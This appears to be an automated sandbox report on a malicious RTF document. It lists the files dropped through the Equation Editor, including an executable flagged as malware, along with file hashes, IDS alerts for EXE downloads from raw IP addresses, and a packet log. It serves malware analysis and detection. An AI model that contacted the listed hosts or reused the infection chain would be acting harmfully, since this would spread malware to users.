                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1

                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Xkl0PnD8zFPjfh1.wiz.LNK

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Tue Nov 19 16:07:58 2024, length=418646, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1059
                                                                                                                                  Entropy (8bit):4.561963422105871
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:8ajgXg/XAlCPCHaX1BAB/5YXX+WCpUI0d4juicvbIXodeDtZ3YilMMEpxRljKhcM:8U/XTli4XwpkdcNe/deDv3qsw57u
                                                                                                                                  MD5:FA323A2C9506413D48D5BA48D712191E
                                                                                                                                  SHA1:7D986C979CCAE5C215193F9B2B68BA8B134F7C4C
                                                                                                                                  SHA-256:29F64B7799B41F61E45994EE482000547AD196C81E3D20B5FA2671CEA8061B1A
                                                                                                                                  SHA-512:F591232C4D8CBB39BCDB0DAFFE8D2F82E2CF5BD8AB944E2F81B81EAD4AD834FDDDAAF2F6B00577EFF1B05965FB04F4C607325CA4F17579E3F0D8D58722EF1485
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:L..................F.... .......r.......r.....w..:..Vc...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....sY....user.8......QK.XsY..*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.Vc..sY.. .XKL0PN~1.RTF..\.......WE..WE.*.........................X.k.l.0.P.n.D.8.z.F.P.j.f.h.1...w.i.z...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\878411\Users.user\Desktop\Xkl0PnD8zFPjfh1.wiz.rtf.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.X.k.l.0.P.n.D.8.z.F.P.j.f.h.1...w.i.z...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......878411..........D_....3N.

                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:Generic INItialization configuration [folders]
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):73
                                                                                                                                  Entropy (8bit):4.871130551941791
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:H2A3MfAlm4UX3MfAlv:HxMfHnMfC
                                                                                                                                  MD5:CB82D4C74D6BFF434AE5C3DE702AB9F1
                                                                                                                                  SHA1:84FED21BFD3ADD622F14E3B3EADA79504BF2215C
                                                                                                                                  SHA-256:3BD22815A22411F89BA452910204E484BEFA880CF20AF9149559D627AF2E6686
                                                                                                                                  SHA-512:23BAB0C1980BD5FF63E847FFD0418E7949E05211CA461925223ADF0CF40CD0063BB44415451FA755BE58EA3C321464144D138CCA29230BB8AFE17D602C50977A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:[misc]..Xkl0PnD8zFPjfh1.wiz.LNK=0..[folders]..Xkl0PnD8zFPjfh1.wiz.LNK=0..

                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):162
                                                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:vrJlaCkWtVyoLKbi/YnlmW+yeTAGllln:vdsCkWtr+bignb+l
                                                                                                                                  MD5:1A57991C3E13EFE0AF71147826265A23
                                                                                                                                  SHA1:32136211C8F1835CCFA0A9C23ECCE47710621C65
                                                                                                                                  SHA-256:7B63ACAE133205BE9F89C8B18103DACE4547BCCEF1262666F6D18D5F6C540ED7
                                                                                                                                  SHA-512:7D2C7CCC1CDF80845EB9D45366E2556367E9D5F44CD3FA675845CC16857FE5058F85E4F252B0A058EAF3D54652816683BB65B1BFAB5AF53E8B63994CF86EBCF3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2
                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..

                                                                                                                                  C:\Users\user\AppData\Roaming\wealthcharliebgk.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):837120
                                                                                                                                  Entropy (8bit):7.96907229026701
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:zb3VKo7/7uh5twavgmhh4rdOxHOizP3Api7EO2jLW1mmxj0A57l3j4iRlKKAg:zbco7jo5p4CKdOx93HeLGaE7xj40l2
                                                                                                                                  MD5:9D980CAD65D26D5E36BD306044B26AC9
                                                                                                                                  SHA1:80E09457252563A7EC99095364FD1A9FB3D3F27D
                                                                                                                                  SHA-256:A460050185C6DF524792697A1B751A2FB309939E5A34D135459D4A6DBBD66EE0
                                                                                                                                  SHA-512:887FA68F650484950EDFF6C562F24491B286F10806A0AAEB9163076866D878E6B0D54F2B1B2FBC8EFFF98F65451EEEAAA4914C7F86B57FBBD7775BDD571F2728
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<g..............0......"........... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B.......................H.......h^...6......D........*...........................................0..]..........7...%.r...p.%...%.r...p.%...%.r...p.(....(......s.............o......o.........,..o......*.........2..Q.......0..a..........7...%.r...p.%...%.r...p.%...%.r...p.(....(......s.......o...........o.........,..o........+..*.........2..P.......0..B........r...p.rA..p(....(......s.............o .....o.........,..o......*...........6.......0..F........r...p.rA..p(....(......s.......o!..........o...

                                                                                                                                  C:\Users\user\Desktop\~$l0PnD8zFPjfh1.wiz.rtf

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):162
                                                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:vrJlaCkWtVyoLKbi/YnlmW+yeTAGllln:vdsCkWtr+bignb+l
                                                                                                                                  MD5:1A57991C3E13EFE0AF71147826265A23
                                                                                                                                  SHA1:32136211C8F1835CCFA0A9C23ECCE47710621C65
                                                                                                                                  SHA-256:7B63ACAE133205BE9F89C8B18103DACE4547BCCEF1262666F6D18D5F6C540ED7
                                                                                                                                  SHA-512:7D2C7CCC1CDF80845EB9D45366E2556367E9D5F44CD3FA675845CC16857FE5058F85E4F252B0A058EAF3D54652816683BB65B1BFAB5AF53E8B63994CF86EBCF3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (65322), with CR line terminators
                                                                                                                                  Entropy (8bit):3.238178515541963
                                                                                                                                  TrID:
                                                                                                                                  • Rich Text Format (4004/1) 100.00%
                                                                                                                                  File name:Xkl0PnD8zFPjfh1.wiz.rtf
                                                                                                                                  File size:418'646 bytes
                                                                                                                                  MD5:f6e89e6c3ab17d8d58699ccefeaf3c8d
                                                                                                                                  SHA1:86c245d0a2ef138aa7afca6bb43316e251b07c68
                                                                                                                                  SHA256:32f5bf26d32b42212ada3e88017ad037c6c84f760a64585252576d893a00ff5f
                                                                                                                                  SHA512:ab3a82dcd600c7169da373101593480a1ef8e82b2d339b5367f0e2b118f23ec3eb591a3e269de3f5d8b0e0843ec4574b33c5f98e0344c4be38a26c25caccb4b6
                                                                                                                                  SSDEEP:3072:wwAlawAlawAlawAlawAlawAlawAlawAltU8xX2iqwq3QS:wwAYwAYwAYwAYwAYwAYwAYwA3dTqAS
                                                                                                                                  TLSH:E0948A6DD34B02598F620377AB571E5142BDBA7EF38552B1302C533933EAC39A1252BE
                                                                                                                                  File Content Preview:{\rt..{\*\qKCjBQmehMq8XCWngYGOhKf8jfgJl6x3C5RTWeOwPMPiwXrh8fXchBYG6KO5iQT4UIbjZyyYRfKT4wFiWBtxhKnWIj77AVvUkqwfsmK8oAtYSoTUu0YWCABaMo6Ydm700elPyVDLZmN8dZJfI2rUl6W6KReYfcnGIdL8NWRpkP4L8bXujB20tZZiDX3HmSlvdgy0cGlFM}..{\938502664please click Enable editing fr

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:2764a3aaaeb7bdbf

                                                                                                                                  Network Behavior

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-11-19T18:08:04.164643+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1187.120.84.3980192.168.2.2249161TCP
                                                                                                                                  2024-11-19T18:08:04.342515+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2187.120.84.3980192.168.2.2249161TCP
                                                                                                                                  2024-11-19T18:08:11.081951+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249162193.122.130.080TCP
                                                                                                                                  2024-11-19T18:08:12.338005+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249162193.122.130.080TCP
                                                                                                                                  2024-11-19T18:08:12.766539+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249164188.114.97.3443TCP
                                                                                                                                  2024-11-19T18:08:14.160503+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249165193.122.130.080TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Nov 19, 2024 18:08:03.431632042 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:03.436553001 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:03.436620951 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:03.436898947 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:03.441648960 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159611940 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159629107 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159641027 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159651041 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159658909 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159670115 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159679890 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159698963 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159708977 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159719944 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.159730911 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.159730911 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.159730911 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.159730911 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.159730911 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.159791946 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.159791946 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.164643049 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.164653063 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.164663076 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.164690018 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.164710045 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.164710045 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.164753914 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.252067089 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.252202988 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.289896965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.289908886 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.289921045 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.289988995 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.290035963 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.290136099 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.294612885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.294625044 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.294742107 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.294753075 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.294908047 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.294908047 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.299365044 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299376965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299386978 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299432993 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.299432993 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.299448013 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299460888 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299555063 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304157019 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304168940 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304177999 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304194927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304207087 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304219007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304234982 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304234982 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304234982 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304284096 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304284096 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.308929920 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.308943033 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.308953047 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.308964968 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.308974028 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.309196949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.313651085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.313663960 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.313673973 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.313749075 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.313749075 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.342514992 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.342674017 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.429878950 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430047035 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430051088 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430057049 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430069923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430079937 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430088997 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430105925 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430105925 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430105925 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430120945 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430478096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430488110 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430497885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430531025 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430531025 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430809021 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430864096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430871964 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430885077 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430901051 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430912971 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.432671070 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432682991 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432692051 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432727098 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.432727098 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.432823896 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432864904 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.432907104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432918072 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432928085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432938099 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432955027 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433048964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433545113 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433577061 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433588982 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433593988 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433676958 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433686972 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433697939 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433720112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433720112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433720112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433748960 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434444904 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434456110 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434465885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434510946 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434521914 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434531927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434559107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434559107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434559107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434559107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434637070 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.435336113 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435347080 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435358047 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435410976 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435421944 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435431957 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435453892 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.435453892 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.435453892 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.435453892 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.436264038 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436275959 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436286926 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436317921 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.436317921 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.436367989 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436378956 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436389923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436696053 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.436696053 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437139988 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437151909 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437163115 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437205076 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437205076 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437330961 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437341928 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437357903 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.437381029 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437403917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.437954903 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.438013077 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.578836918 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578850031 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578860044 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578871965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578882933 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578892946 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578903913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578947067 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578957081 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578967094 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578978062 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578989983 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.578999043 CET804916187.120.84.39192.168.2.22
